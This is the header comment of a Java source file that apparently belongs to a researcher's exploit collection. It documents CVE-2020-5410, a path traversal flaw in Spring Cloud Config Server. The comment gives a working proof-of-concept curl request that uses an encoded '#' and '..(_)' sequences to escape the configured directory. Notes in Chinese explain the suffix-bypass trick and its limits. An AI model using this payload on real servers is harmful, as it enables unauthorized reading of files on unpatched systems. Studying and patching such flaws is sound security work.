/**
 *
 * CVE-2020-5410
 *
 * org.springframework.cloud.config.server.environment.EnvironmentController#getEnvironment(java.lang.String, java.lang.String, java.lang.String, boolean)
 *
 * echo "threedr3am" > /tmp/fake-news.txt
 * curl http://127.0.0.1:9988/fake-news.txt%23/bbbbb/..%28_%29..%28_%29..
 *
 * 利用核心：使用#去注释掉springboot自动拼接的配置文件后缀
 *
 * todo 限制：
 * 1. 只能穿越到上层目录，比如native目录在 /tmp/aaa/bbb，则只能穿到 /tmp/aaa 或 /tmp 或 /
 * 2. 文件必须存在后缀
 *
 * @author threedr3am
 */
package com.threedr3am.bug.spring.config.server;